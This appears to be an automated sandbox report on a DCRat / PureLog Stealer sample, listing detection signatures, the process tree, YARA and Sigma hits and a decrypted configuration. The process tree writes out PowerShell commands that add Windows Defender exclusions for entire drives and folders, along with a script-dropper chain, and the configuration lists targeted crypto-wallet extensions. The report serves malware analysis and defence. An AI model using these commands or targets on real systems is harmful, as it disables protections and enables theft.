Windows Analysis Report
ZZ2sTsJFrt.exe

Overview

General Information

Sample name: ZZ2sTsJFrt.exe
renamed because original name is a hash value
Original sample name: 403138422d8da9fdd31fe147959a1403.exe
Analysis ID: 1581724
MD5: 403138422d8da9fdd31fe147959a1403
SHA1: 913139b08964bc2039eeeea9f491c5c8507b7dcc
SHA256: 4b1a5d38d7741fea74f2cf45d5b215955ba9fe117d6f6a0e7ecbef64118c449b
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops executable to a common third party application directory
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZZ2sTsJFrt.exe (PID: 6784 cmdline: "C:\Users\user\Desktop\ZZ2sTsJFrt.exe" MD5: 403138422D8DA9FDD31FE147959A1403)
    • wscript.exe (PID: 2128 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3104 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\PniGsaMva0WDN2bCUuIn757jtMvPYPCKlQoP3qJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • HyperPortContainerproviderinto.exe (PID: 3168 cmdline: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe" MD5: 34EAB3FCCF84F6B9ABF20B49DB5FCF6E)
          • powershell.exe (PID: 6448 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6808 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6200 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4948 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2128 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 5436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7212 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7240 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\ssh\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7356 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7408 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Documents\My Pictures\AaHCyFZRuOMjGDqdgJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7464 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8248 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 8712 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 9064 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • dasHost.exe (PID: 8628 cmdline: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" MD5: 34EAB3FCCF84F6B9ABF20B49DB5FCF6E)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • svchost.exe (PID: 3396 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
ZZ2sTsJFrt.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
ZZ2sTsJFrt.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: HyperPortContainerproviderinto.exe PID: 3168 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.ZZ2sTsJFrt.exe.537e723.1.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.ZZ2sTsJFrt.exe.537e723.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ProcessId: 3168, TargetFilename: C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe", ParentImage: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ParentProcessId: 3168, ParentProcessName: HyperPortContainerproviderinto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6448, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" , CommandLine: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, NewProcessName: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, OriginalFileName: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8248, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe" , ProcessId: 8628, ProcessName: dasHost.exe
                                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ZZ2sTsJFrt.exe", ParentImage: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, ParentProcessId: 6784, ParentProcessName: ZZ2sTsJFrt.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , ProcessId: 2128, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe", ParentImage: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ParentProcessId: 3168, ParentProcessName: HyperPortContainerproviderinto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6448, ProcessName: powershell.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ZZ2sTsJFrt.exe", ParentImage: C:\Users\user\Desktop\ZZ2sTsJFrt.exe, ParentProcessId: 6784, ParentProcessName: ZZ2sTsJFrt.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\GgQkil7dD38i66IF6CgYN1iKH8yPMrkKOsB0R1MTAIce7pdb.vbe" , ProcessId: 2128, ProcessName: wscript.exe
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor/HyperPortContainerproviderinto.exe", ParentImage: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, ParentProcessId: 3168, ParentProcessName: HyperPortContainerproviderinto.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 6448, ProcessName: powershell.exe
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3396, ProcessName: svchost.exe
                                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                                    2024-12-28T20:42:32.204312+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49734 | 104.21.38.84 | 80 | TCP

                                    AV Detection

                                    Source: ZZ2sTsJFrt.exeAvira: detected
                                    Source: http://048038cm.renyash.ru/pipepacketprocessGeneratordownloads.phpAvira URL Cloud: Label: malware
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\6XMNLNVLzg.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeReversingLabs: Detection: 82%
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\ProgramData\ssh\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\Default\Pictures\AaHCyFZRuOMjGDqdgJ.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeReversingLabs: Detection: 82%
                                    Source: C:\Users\user\Desktop\AXpVrZKc.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\EZcCRmIO.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\VVwrSJqk.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\cYVGOFtR.logReversingLabs: Detection: 37%
                                    Source: C:\Users\user\Desktop\iczfvMBI.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\kCewxyIz.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\kKNOcijE.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\kwtgfRAG.logReversingLabs: Detection: 29%
                                    Source: C:\Users\user\Desktop\ufMwPuFo.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\vqImhKDh.logReversingLabs: Detection: 50%
                                    Source: ZZ2sTsJFrt.exeReversingLabs: Detection: 70%
                                    Source: ZZ2sTsJFrt.exeVirustotal: Detection: 52%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exeJoe Sandbox ML: detected
                                    Source: ZZ2sTsJFrt.exeJoe Sandbox ML: detected
                                    Source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                    Source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-cgzjbH04kjspqA3ekPHR","0","Nursultan Alpha","","0","0","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                                    Source: ZZ2sTsJFrt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AaHCyFZRuOMjGDqdgJ.exe
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\dd5be8a07a6153
                                    Source: ZZ2sTsJFrt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ZZ2sTsJFrt.exe
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F0A69B
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F1C220
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user
